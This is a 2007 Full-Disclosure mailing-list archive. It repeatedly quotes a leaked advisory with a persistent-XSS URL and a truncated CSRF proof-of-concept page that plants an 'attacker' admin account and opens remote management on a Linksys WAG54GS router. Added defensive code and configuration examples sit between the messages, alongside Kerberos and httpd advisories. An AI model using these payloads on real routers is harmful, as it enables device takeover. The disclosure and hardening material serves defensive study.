Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Dr. Neal Krawetz PhD
We heard you the first time, gobbles aka n3td3v.

- doc neal
http://www.hackerfactor.com/blog/

On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml
 
 If you bothered that much you deserve the advisory I guess :-D.
 
 btw, I didn't know google pages have sitemap.xml enabled by default.
 
 So no hash cracking here, just to set things straight.
 
 Joey Mengele wrote:
  After plugging this hash into John The Ripper, I was able to
  reproduce the text of the original advisory. It follows in
  entirety. For those wishing to verify the hash provided by the
  architect, I have also included the advisory in attachment form as
  a convenience for the skeptics who say MD5 can not be reversed.
 
  J
 
  ___ BEGIN LAME CRACKED ADVISORY ___
  Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
  SpeedBooster (WAG54GS)
 
  == Date found ==
 
  24 June 2007
 
  == Firmware Version ==
 
  V1.00.06
 
  == Description ==
 
 
  There are several persistent XSS vulnerabilities on the
  '/setup.cgi' script.
 
  It is possible to inject JavaScript by assigning a payload like the
  following
  to any of the vulnerable parameters:
 
  <script>[PAYLOAD]</script>
 
  The vulnerable (non-sanitized) parameters are the following:
 
  'devname'
  'snmp_getcomm'
  'snmp_setcomm'
  'c4_trap_ip_'
 
  Additionally, all HTTP requests are not tokenized using non-
  predictable values.
  Thus, all requests to the router's HTTP interface are vulnerable to
  Cross-site
  Request Forgeries (CSRF), perhaps by design.
 
  The following is an example of a HTTP request (notice the lack of
  non-predictable tokens):
 
  POST /setup.cgi HTTP/1.1
  Authorization: Basic YWRtaW46YWRtaW4=
 
  mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file
  =Factorydefaults.htmnext_file=index.htmmessage=
 
  Although the original request is a POST, we can convert it to a
  GET, so that all posted parameters can be submitted on a single URL.
 
  For example, the previous POST request can be converted to a URL
  such as the following:
 
  http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor
  y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f
  ile=index.htmmessage=
 
  By forging administrative requests (Administration button on the
  router's HTML menu), an attacker can compromise the router provided
  the
  victim user visits a malicious URL or HTML page.
 
  The attack can only be successful if any of the following
  conditions are met:
 
  - the administrator hasn't changed the default credentials
  (admin/admin)
  - the administrator's browser has an active authentication session
  with the router's interface when the attack happens
(highly unlikely)
 
 
  == Persistent XSS PoC ==
 
  The following URL creates a DoS condition by making the
  Administration page inaccessible since 'history.back()'
  will run every time the Administration page is visited. Thus the
  administrator won't be able to ever change the
  default credentials unless a hard reset is performed using the
  router's physical restart switch:
 
  http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin
  sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp
  _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e
  nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged=
  yesh_remote_management=enablec4_trap_ip_=scripthistory.back()
  /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena
  bletodo=savethis_file=Administration.htmnext_file=Administration.
  htmmessage=
  http://tinyurl.com/36sjzw
 
 
  == CSRF PoC ==
 
  The following HTML page does the following:
 
  - adds an *additional* administrative account, with a username
  equal to 'attacker' and a password equal to '0wned' (without
  removing original admin account!)
  - enables remote HTTP management over port 1337
  - sets other settings that are irrelevant to this discussion
 
  <html>
  <body>
  <script>
  // send 2 requests to add an administrative account and enable
  remote management
  // tries with default credentials and with credentials cached by
  browser (if any)
 
  var img = new Image();
  var img2 = new Image();
 
  img.src =
  'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack
  ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh
  ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla
  n_enable=enablesave=Save+Settingsh_user_list=8h_pwset=yespwchang
  ed=yesh_remote_management=enablec4_trap_ip_=h_snmp_enable=disable
  h_upnp_enable=enableh_wlan_enable=enabletodo=savethis_file=Admin
  istration.htmnext_file=Administration.htmmessage=';
  img2.src =
  'http://192.168.1.1/setup.cgi?user_list=8sysname=attackersysPasswd
  

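The advisory quoted above faults two things in the router's setup.cgi: state-changing requests carry no unpredictable token, and parameters such as 'devname' are stored and echoed back unsanitized. What follows is an added example, not code from the advisory, from the vendor, or from anyone in the thread: a hypothetical Python stand-in for such a handler showing the two missing controls, a per-session CSRF token compared in constant time before any setting is changed (with state changes limited to POST), and HTML escaping when the stored value is rendered. The function names, the session store and the sample form bodies are all constructed for the example.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs

# Constructed stand-in for the router's session store: session id -> CSRF token.
SESSIONS = {}


def new_session():
    """Start an admin session and bind a fresh, unpredictable CSRF token to it."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = secrets.token_hex(16)
    return sid


def csrf_token_for(sid):
    """Token the legitimate admin UI embeds in its own forms for this session."""
    return SESSIONS[sid]


def handle_setup(sid, method, form_body, settings):
    """Hypothetical hardened stand-in for setup.cgi (not the router's code).

    A state change is applied only if it arrives by POST and carries a
    csrf_token equal to the one bound to the caller's session. A forged
    cross-site request (an <img> GET, or an auto-submitted form from another
    origin) cannot read that token, so it fails here even when the browser
    still holds valid credentials. Returns an (http_status, reason) pair.
    """
    if method != "POST":
        return 405, "state changes are accepted only via POST"
    params = parse_qs(form_body)
    supplied = params.get("csrf_token", [""])[0]
    expected = SESSIONS.get(sid, "")
    # Constant-time comparison; a session with no token at all is rejected too.
    if not expected or not hmac.compare_digest(supplied, expected):
        return 403, "missing or wrong CSRF token"
    for key in ("devname", "sysname", "remote_management", "http_wanport"):
        if key in params:
            settings[key] = params[key][0]
    return 200, "saved"


def render_unsafe(settings):
    """The behaviour the advisory describes: the stored value is echoed verbatim,
    so markup inside it becomes live on every view of the page."""
    return "<td>Device name: %s</td>" % settings.get("devname", "")


def render_safe(settings):
    """Hardened rendering: escape at output time so markup in the value stays text."""
    return "<td>Device name: %s</td>" % html.escape(settings.get("devname", ""), quote=True)


def demo():
    """Run the three request shapes and return what each one produced."""
    settings = {}
    sid = new_session()
    # Constructed forged request body, as a cross-site page would send it.
    forged = "devname=%3Cscript%3Ehistory.back()%3C/script%3E&save=Save+Settings"
    forged_get = handle_setup(sid, "GET", forged, settings)    # img.src style
    forged_post = handle_setup(sid, "POST", forged, settings)  # auto-submitted form
    # A legitimate submission from the admin UI carries the session's token.
    legit = "devname=%3Cb%3Elab%3C/b%3E&csrf_token=" + csrf_token_for(sid)
    legit_post = handle_setup(sid, "POST", legit, settings)
    return {
        "forged_get": forged_get,
        "forged_post": forged_post,
        "legit_post": legit_post,
        "stored_devname": settings.get("devname"),
        "unsafe_html": render_unsafe(settings),
        "safe_html": render_safe(settings),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

Both forged requests are refused before anything is written, and the value that the legitimate request does store reaches the page as text under render_safe, which is the fix for the 'devname', 'snmp_getcomm', 'snmp_setcomm' and 'c4_trap_ip_' cases the advisory lists. The token must be generated from a CSPRNG and bound to the session, not derived from anything an attacker could guess, which is the "non-predictable" property the advisory says the router lacks.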
Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread Dr. Neal Krawetz PhD
I believe this makes you the fool.

- doc neal, phd
http://www.hackerfactor.com/blog/


On Wed, Jun 27, 2007 at 11:07:11PM +0100, pagvac wrote:
 I didn't intend to send it twice.
 
 On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote:
 We heard you the first time, gobbles aka n3td3v.
 
 - doc neal
 http://www.hackerfactor.com/blog/
 
 On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml
 
  If you bothered that much you deserve the advisory I guess :-D.
 
  btw, I didn't know google pages have sitemap.xml enabled by default.
 
  So no hash cracking here, just to set things straight.
 
  Joey Mengele wrote:
   After plugging this hash into John The Ripper, I was able to
   reproduce the text of the original advisory. It follows in
   entirety. For those wishing to verify the hash provided by the
   architect, I have also included the advisory in attachment form as
   a convenience for the skeptics who say MD5 can not be reversed.
  
   J
  
   ___ BEGIN LAME CRACKED ADVISORY ___
   Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
   SpeedBooster (WAG54GS)
  
   == Date found ==
  
   24 June 2007
  
   == Firmware Version ==
  
   V1.00.06
  
   == Description ==
  
  
   There are several persistent XSS vulnerabilities on the
   '/setup.cgi' script.
  
   It is possible to inject JavaScript by assigning a payload like the
   following
   to any of the vulnerable parameters:
  
   <script>[PAYLOAD]</script>
  
   The vulnerable (non-sanitized) parameters are the following:
  
   'devname'
   'snmp_getcomm'
   'snmp_setcomm'
   'c4_trap_ip_'
  
   Additionally, all HTTP requests are not tokenized using non-
   predictable values.
   Thus, all requests to the router's HTTP interface are vulnerable to
   Cross-site
   Request Forgeries (CSRF), perhaps by design.
  
   The following is an example of a HTTP request (notice the lack of
   non-predictable tokens):
  
   POST /setup.cgi HTTP/1.1
   Authorization: Basic YWRtaW46YWRtaW4=
  
   mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file
   =Factorydefaults.htmnext_file=index.htmmessage=
  
   Although the original request is a POST, we can convert it to a
   GET, so that all posted parameters can be submitted on a single URL.
  
   For example, the previous POST request can be converted to a URL
   such as the following:
  
   http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor
   y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f
   ile=index.htmmessage=
  
   By forging administrative requests (Administration button on the
   router's HTML menu), an attacker can compromise the router provided
   the
   victim user visits a malicious URL or HTML page.
  
   The attack can only be successful if any of the following
   conditions are met:
  
   - the administrator hasn't changed the default credentials
   (admin/admin)
   - the administrator's browser has an active authentication session
   with the router's interface when the attack happens
 (highly unlikely)
  
  
   == Persistent XSS PoC ==
  
   The following URL creates a DoS condition by making the
   Administration page inaccessible since 'history.back()'
   will run every time the Administration page is visited. Thus the
   administrator won't be able to ever change the
   default credentials unless a hard reset is performed using the
   router's physical restart switch:
  
   http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin
   sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp
   _wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e
   nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged=
   yesh_remote_management=enablec4_trap_ip_=scripthistory.back()
   /scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena
   bletodo=savethis_file=Administration.htmnext_file=Administration.
   htmmessage=
   http://tinyurl.com/36sjzw
  
  
   == CSRF PoC ==
  
   The following HTML page does the following:
  
   - adds an *additional* administrative account, with a username
   equal to 'attacker' and a password equal to '0wned' (without
   removing original admin account!)
   - enables remote HTTP management over port 1337
   - sets other settings that are irrelevant to this discussion
  
   <html>
   <body>
   <script>
   // send 2 requests to add an administrative account and enable
   remote management
   // tries with default credentials and with credentials cached 
 by
   browser (if any)
  
   var img = new Image();
   var img2 = new Image();
  
   img.src =
   'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8sysname=attack
   ersysPasswd=0wnedsysConfirmPasswd=0wnedremote_management=enableh
   ttp_wanport=1337devname=snmp_enable=disableupnp_enable=enablewla
   

Re: [Full-disclosure] Persistent XSS and CSRF on network appliance[subject corrected :) ]

2007-06-27 Thread Pete Simpson
I haven't followed all of this rather strange thread, but I wonder if
n_td_v, gobble_ and the venerable Doctor may be one and the same group?
After all few educated individuals would be likely to be so pretentious
as to declare themselves as both Dr and PhD? As if we might confuse the
guy, on this list with a doctor of medicine or a doctor of divinity or a
witch doctor? Odd.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dr. Neal
Krawetz PhD
Sent: 27 June 2007 23:35
To: pagvac
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Persistent XSS and CSRF on network
appliance[subject corrected :) ]

I believe this makes you the fool.

- doc neal, phd
http://www.hackerfactor.com/blog/


On Wed, Jun 27, 2007 at 11:07:11PM +0100, pagvac wrote:
 I didn't intend to send it twice.
 
 On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote:
 We heard you the first time, gobbles aka n3td3v.
 
 - doc neal
 http://www.hackerfactor.com/blog/
 
 On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote:
  -BEGIN PGP SIGNED MESSAGE-
  Hash: SHA1
 
  Nice look up to
http://unknown.pentester.googlepages.com/sitemap.xml
 
  If you bothered that much you deserve the advisory I guess :-D.
 
  btw, I didn't know google pages have sitemap.xml enabled by
default.
 
  So no hash cracking here, just to set things straight.
 
  Joey Mengele wrote:
   After plugging this hash into John The Ripper, I was able to
   reproduce the text of the original advisory. It follows in
   entirety. For those wishing to verify the hash provided by the
   architect, I have also included the advisory in attachment form
as
   a convenience for the skeptics who say MD5 can not be reversed.
  
   J
  
   ___ BEGIN LAME CRACKED ADVISORY ___
   Persistent XSS and CSRF and on Wireless-G ADSL Gateway with
   SpeedBooster (WAG54GS)
  
   == Date found ==
  
   24 June 2007
  
   == Firmware Version ==
  
   V1.00.06
  
   == Description ==
  
  
   There are several persistent XSS vulnerabilities on the
   '/setup.cgi' script.
  
   It is possible to inject JavaScript by assigning a payload like
the
   following
   to any of the vulnerable parameters:
  
   <script>[PAYLOAD]</script>
  
   The vulnerable (non-sanitized) parameters are the following:
  
   'devname'
   'snmp_getcomm'
   'snmp_setcomm'
   'c4_trap_ip_'
  
   Additionally, all HTTP requests are not tokenized using non-
   predictable values.
   Thus, all requests to the router's HTTP interface are vulnerable
to
   Cross-site
   Request Forgeries (CSRF), perhaps by design.
  
   The following is an example of a HTTP request (notice the lack of
   non-predictable tokens):
  
   POST /setup.cgi HTTP/1.1
   Authorization: Basic YWRtaW46YWRtaW4=
  
  
mtenRestore=Restore+Factory+Defaultstodo=defaultsettingsthis_file
   =Factorydefaults.htmnext_file=index.htmmessage=
  
   Although the original request is a POST, we can convert it to a
   GET, so that all posted parameters can be submitted on a single
URL.
  
   For example, the previous POST request can be converted to a URL
   such as the following:
  
  
http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor
  
y+Defaultstodo=defaultsettingsthis_file=Factorydefaults.htmnext_f
   ile=index.htmmessage=
  
   By forging administrative requests (Administration button on
the
   router's HTML menu), an attacker can compromise the router
provided
   the
   victim user visits a malicious URL or HTML page.
  
   The attack can only be successful if any of the following
   conditions are met:
  
   - the administrator hasn't changed the default credentials
   (admin/admin)
   - the administrator's browser has an active authentication
session
   with the router's interface when the attack happens
 (highly unlikely)
  
  
   == Persistent XSS PoC ==
  
   The following URL creates a DoS condition by making the
   Administration page inaccessible since 'history.back()'
   will run every time the Administration page is visited. Thus the
   administrator won't be able to ever change the
   default credentials unless a hard reset is performed using the
   router's physical restart switch:
  
  
http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1sysname=admin
  
sysPasswd=adminsysConfirmPasswd=adminremote_management=enablehttp
  
_wanport=8080devname=snmp_enable=disableupnp_enable=enablewlan_e
  
nable=enablesave=Save+Settingsh_user_list=1h_pwset=yespwchanged=
  
yesh_remote_management=enablec4_trap_ip_=scripthistory.back()
  
/scripth_snmp_enable=enableh_upnp_enable=enableh_wlan_enable=ena
  
bletodo=savethis_file=Administration.htmnext_file=Administration.
   htmmessage=
   http://tinyurl.com/36sjzw
  
  
   == CSRF PoC ==
  
   The following HTML page does the following:
  
   - adds an *additional* administrative account, with a username
   equal to 'attacker' and a password equal to '0wned' (without
   removing original admin account!)
   - enables remote HTTP 

Re: [Full-disclosure] Persistent XSS and CSRF on network appliance [subject corrected :) ]

2007-06-27 Thread coderman
On 6/27/07, Dr. Neal Krawetz PhD [EMAIL PROTECTED] wrote:
 We heard you the first time, gobbles aka n3td3v.

the ruse has died since jt5944 spoiled the fun.  ~_~;

try forging the hush.mac.com addr?  oh well, i myself would avoid this
list after equating full disclosure with extortion and terrorism* like
the good doctor did so succinctly in his last response to this fine
group...

alas, now even your facade is insufficient proxy for mockery.  dear
Dr. Neal Krawetz, PhD., we know you are listening; why have you
forsaken us?

---

* Apr 18 2007 - UK ISP threatens security researcher

Let's keep in mind that publishing most security information borders
extortion. There isn't any other industry where fat nerds try to
strongarm large corporations...




Re: [Full-disclosure] Persistent XSS and CSRF on network appliance[subject corrected :) ]

2007-06-27 Thread coderman
On 6/27/07, Pete Simpson [EMAIL PROTECTED] wrote:
 ...
 After all few educated individuals would be likely to be so pretentious
 as to declare themselves as both Dr and PhD?

lol

it is the Stanford envy; for the AM philosopher must shore up his
fine credentials lest the authority and expertise conveyed by such be
underestimated...



[Full-disclosure] rPSA-2007-0135-1 krb5 krb5-server krb5-services krb5-test krb5-workstation

2007-06-27 Thread rPath Update Announcements
rPath Security Advisory: 2007-0135-1
Published: 2007-06-27
Products: rPath Linux 1
Rating: Critical
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
krb5=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1
krb5-server=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1
krb5-services=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1
krb5-test=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1
krb5-workstation=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798
https://issues.rpath.com/browse/RPL-1499
http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-004.txt
http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-005.txt

Description:
Previous versions of the krb5 package are vulnerable to three
attacks.  Two (MITKRB5-SA-2007-004: CVE-2007-2442 and CVE-2007-2443)
are likely limited in practice on rPath Linux to denial of service,
but the third (MITKRB5-SA-2007-005: CVE-2007-2798) is believed to
allow a remote arbitrary code execution attack against kadmind
servers.  rPath Linux systems are not automatically configured with
kadmind enabled.  Systems configured as kerberos administrative
servers are vulnerable.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



[Full-disclosure] rPSA-2007-0136-1 httpd mod_ssl

2007-06-27 Thread rPath Update Announcements
rPath Security Advisory: 2007-0136-1
Published: 2007-06-27
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
httpd=/[EMAIL PROTECTED]:devel//1/2.0.59-0.7-1
mod_ssl=/[EMAIL PROTECTED]:devel//1/2.0.59-0.7-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
https://issues.rpath.com/browse/RPL-1500

Description:
Previous versions of the httpd package contain two vulnerabilities
that affect only non-default configurations.  One enables a
cross-site-scripting (XSS) attack if ExtendedStatus is enabled
and the server status page is publically accessible (not generally
recommended), the other allows remote attackers to cause the httpd
process to crash by sending a maliciously-crafted request if caching
is enabled (CacheEnable).

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
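The httpd advisory above ties the XSS to a non-default combination: ExtendedStatus enabled together with a status page that anyone can reach. As an added example, not rPath's nor the Apache project's own configuration, this httpd.conf fragment shows the weak form (commented out) next to the access-restricted form, in the 2.0/2.2 directive syntax that matches the 2.0.59 packages named above; in Apache 2.4 the Order/Deny/Allow lines become `Require ip 127.0.0.1`.

```apache
# Weak: every client can read the detailed status page.
# ExtendedStatus On
# <Location /server-status>
#     SetHandler server-status
# </Location>

# Hardened: keep the status page off the public face of the server and
# leave the extended detail off unless monitoring actually needs it.
ExtendedStatus Off
<Location /server-status>
    SetHandler server-status
    Order deny,allow
    Deny from all
    Allow from 127.0.0.1
</Location>
```

The second issue in the advisory (CVE-2007-1863) needs mod_cache active through a CacheEnable directive; on a host where the update cannot be applied at once, leaving CacheEnable commented out removes that exposure at the cost of caching until the fixed package is installed.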



Re: [Full-disclosure] Persistent XSS and CSRF and on network appliance

2007-06-27 Thread bugtraq
For the love of god people can we stop with the hashing already?



 Such research was done by pdp (architect) and myself. We informed the
 vendor and will publish the details when a fix is available.
 
 The following is the MD5 hash for the advisory file.
 
 $ md5sum.exe research.txt
 3db1d71fc3a0eae119617b3b1124206f  *research.txt
 
 Regards,
 
 - --
 pagvac
 [http://gnucitizen.org, http://ikwt.com/]
 
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.2.2 (MingW32)
  
 iD8DBQFGgsGdjXB4hX6OC/cRAnwiAKCVI2JC4JNMvWXa3U/4b7WlH4FIfwCg1bL9
 4ch1PaYvt6TSWtKVJX2cfgs=
 =Ls8N
 -END PGP SIGNATURE-
 
 

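The quoted post commits to an unpublished advisory by posting the md5sum of the file, and the thread then argues about whether such a hash can be "reversed". The point a verifier should take away is that a bare hash of a text is only a commitment as long as nobody else can obtain or enumerate the text: whoever has it simply recomputes the digest, which is verification, not reversal. The block below is an added example, not code from anyone in the thread; it computes md5sum-style digests of a constructed sample text (the real research.txt and its hash are not reproduced here), then shows a commitment that mixes in a secret random nonce revealed together with the text, so the digest cannot be confirmed by guessing the text alone. All function names and the sample text are constructed for the example.

```python
import hashlib
import hmac
import secrets


def file_digests(data):
    """Digests a poster would publish for an advisory file (md5sum-style, plus stronger ones)."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def make_commitment(advisory, nonce=None):
    """Commit to the advisory text without revealing it.

    A bare hash is a sound commitment only if the text is neither guessable nor
    retrievable; anyone who gets hold of the plaintext just recomputes it. A
    secret 32-byte nonce, published only at reveal time, removes that shortcut.
    Returns (nonce, commitment_hex).
    """
    if nonce is None:
        nonce = secrets.token_bytes(32)
    commitment = hashlib.sha256(nonce + advisory).hexdigest()
    return nonce, commitment


def verify_commitment(advisory, nonce, published):
    """Reveal step: recompute from the disclosed text and nonce, compare in constant time."""
    return hmac.compare_digest(hashlib.sha256(nonce + advisory).hexdigest(), published)


def demo():
    # Constructed sample body; not the advisory the thread is about.
    advisory = b"Constructed sample advisory body, not a real one.\n"
    bare = file_digests(advisory)
    # "Reproducing" the advisory from its md5 means someone had the text and
    # recomputed the digest; the hash function was never inverted.
    recomputed_matches = file_digests(advisory)["md5"] == bare["md5"]
    nonce, commitment = make_commitment(advisory)
    return {
        "bare_md5_len": len(bare["md5"]),
        "recomputed_matches": recomputed_matches,
        "reveal_ok": verify_commitment(advisory, nonce, commitment),
        "tampered_rejected": not verify_commitment(advisory + b"altered", nonce, commitment),
        "wrong_nonce_rejected": not verify_commitment(advisory, b"\x00" * 32, commitment),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

SHA-256 is used for the commitment rather than MD5 because MD5 collisions are practical, which would let a committer who controls the text prepare two different advisories with the same digest and choose which one to "reveal" later; a reader checking a posted hash should ask for a SHA-256 value alongside any md5sum output.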


[Full-disclosure] FLEA-2007-0029-1: krb5 krb5-workstation

2007-06-27 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0029-1
Published: 2007-06-27

Rating: Critical

Updated Versions:
krb5=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1
krb5-workstation=/[EMAIL PROTECTED]:devel//1/1.4.1-7.7-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.1-0.2-3

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798
http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-004.txt
http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2007-005.txt
https://issues.rpath.com/browse/RPL-1499

Description:
Previous versions of the krb5 package are vulnerable to three
attacks. Two (MITKRB5-SA-2007-004: CVE-2007-2442 and CVE-2007-2443)
are likely limited in practice on Foresight Linux to denial of service,
but the third (MITKRB5-SA-2007-005: CVE-2007-2798) is believed to
allow a remote arbitrary code execution attack against kadmind
servers. Foresight Linux systems are not automatically configured with
kadmind enabled.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html



Re: [Full-disclosure] Persistent XSS and CSRF and on networkappliance

2007-06-27 Thread Morning Wood
 For the love of god people can we stop with the hashing already?

hmm... i like hash ( and cake )
can we have a Month of Hash Cakes?



[Full-disclosure] Month of Random Hashes: DAY FIFTEEN

2007-06-27 Thread Month of Random Hashes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[ITEM #1]
md5: f003f211097296b2550fe760b0a15b56
sha1: 0e5d518cb65a403ef9261865727f9be8b9b8faa1
sha256:
e5ac98012e4943b081065f9fa968a862876d64e96ba54c06e7e305114970870f

[ITEM #2]
md5: da39ec93068bb4ec75c65ce647fa32ef
sha1: c2befeaad596b67d2d6c8297be5b4b46bed026b1
sha256:
5becbfb628eea10223fb756712f00f633f3ba479b5b39305ebd0dffbaedf2f18

[ITEM #3]
md5: 2189d1195b2e9f7b89e18eff81919a39
sha1: ed657e2c7fe7a68f919dccb4014d35934851d034
sha256:
860527c5982fb6343bc6ac0d335b2dbf86c03d60adc1b17809a74205ae3600f8

[ITEM #4]
md5: 59636bc08b73d5d5b6062b4b2d0ad091
sha1: df58520257267ea8f0a166c99742b37ba0f2ff11
sha256:
8ef3b72bd41a57859da9d0745f256d8e5bff9d3d250b6bfbc6dfa8350a3825d4

[ITEM #5]
md5: de93832763a69a40faff6586971ce21e
sha1: 82cfffe7690c838f60d81bf65aaf014c466e1c21
sha256:
9c6f7b773279592e2ce32e9f48839f4325c89bceb8bb71130a89be363459fb07

[ITEM #6]
md5: 61c48d4071c40e85c1bc36bd107e50ef
sha1: 017bd2232d99b013777218edd9ab6edfe316886d
sha256:
1102aede8b8a904192d27335b48ba33b3f7309961a938505110f319314a8545a

[ITEM #7]
md5: 0c5e5ff38c585acd6128140789b093c7
sha1: 2e1bbc3b9d2358a8edde9117efa1506cbf7f6d12
sha256:
9d43a3aed0efd2e2dba0f3076b556dc6f5bc2a2384310096f27ff82e169119bf

[ITEM #8]
md5: bf4f20095703032d6b966bdcbb1b0481
sha1: eedf55eaa6dbb00192a333d4e82d7268effab6bd
sha256:
997ee9423e709825dc6e57197544dae07add628136f8acc7cb56656ab7c33f92

[ITEM #9]
md5: 8673f9eb71211558dd53cb9e3dceb700
sha1: 0ce86089f62633d8787f03d5361b8b8ef611a143
sha256:
d0e9d0bd85ec87901abcf59655deff78b5375fcccdda8e937a2c5d347c11e888

[ITEM #10]
md5: b2aa5bee7d025e3053be39049868bbc2
sha1: 22c3d71844c3ea170f677e5c089582f0cc72db82
sha256:
7771c30dd4a6479ecf685554abbbc726331c76bd9f0d77c6ca30e2b4205e8ef6

[ITEM #11]
md5: 607aba17bf2fe5768116119be7c590ed
sha1: c19c04dc4d4c10394f30c42e2653d0010bc5ad13
sha256:
9f3867d44eb3613441a6f77720db7367c6fc0c63c4a8252c643fe9ca2f8d63ff

[ITEM #12]
md5: d18a71991fe6fe71863255d800f49b11
sha1: 6f562fdd37fd9b424a3a3a22cf0204622ef6651d
sha256:
77807bff775a31e43a5f5c2a5a7a27bccb2cde89869468ff4a30f812bfd8f1a5

[ITEM #13]
md5: c7383dcf87ec055cb696b470e494cb3c
sha1: b88a37d3da169c83ee09ccd76de1bfe18da183fa
sha256:
ed145d836befb02784eb01676657ca1f9b394bc6a5994094ade0bef6d2d146d9

[ITEM #14]
md5: 4f9ff4093fdfa039e9027b027fb24f70
sha1: 5098e96590198219f00ee97ce27a219e58c51636
sha256:
765773c413c7db77cd8ae0cf6cd2a6e0ab3bbe2dca6e19d69d3d7da8c549fdd1

[ITEM #15]
md5: 8e13d1305aeb2b00c8bade97d6d99f38
sha1: 0c252548abd4b02399e52b80ad50898df092bcff
sha256:
0af18a8689f44d18555a94848e60513e696baaa2cedecba4b04cefa3daea4245

[ITEM #16]
md5: eb2d6067f5f352e3d2913b7ad1880d1b
sha1: 357ed1ad735c90fc064f69d646d117e357a1fcfe
sha256:
bb49541476d10861a445481d652a2e85bed672ddc76fc5f2b320b32d1afbb19a

[ITEM #17]
md5: 86c7326fcf15eaa95e8ae3baf0e2848c
sha1: e320df6042c003df460b7fcb69410f1f4c503ea7
sha256:
2f621b314c6017ba701583eded1b449463afecd3ef5f5baed49c2f88d453bcb7

[ITEM #18]
md5: 34f1d685bc696ea1c47fbe7f0a0ac680
sha1: bef9c295c051eeda0670d30b30483369416fc97d
sha256:
4378aa8d8bfaa79da2d742ed7a3ab4ca615d0331cfe212e2c16dc5761e7ef645

[ITEM #19]
md5: 2eb6dce0a0413a24fd8666c33f242fc9
sha1: 72ed8414eb67f28c99eb825c1e8eecbd61cdf281
sha256:
e8c320447b09b8ad2e1b808d01fd11a3d530428e1f1a206317af6bc3eb0f4b51

[ITEM #20]
md5: 19c9d4e31bbf5def4e703cfa3768cf5f
sha1: ceea75684e12565c9dd4d2f26a7cbcdfd07e52ff
sha256:
d19374a0e37161bdf2907af17f9738c12ebb05da47a4b98ce470d9e80329fa43

[ITEM #21]
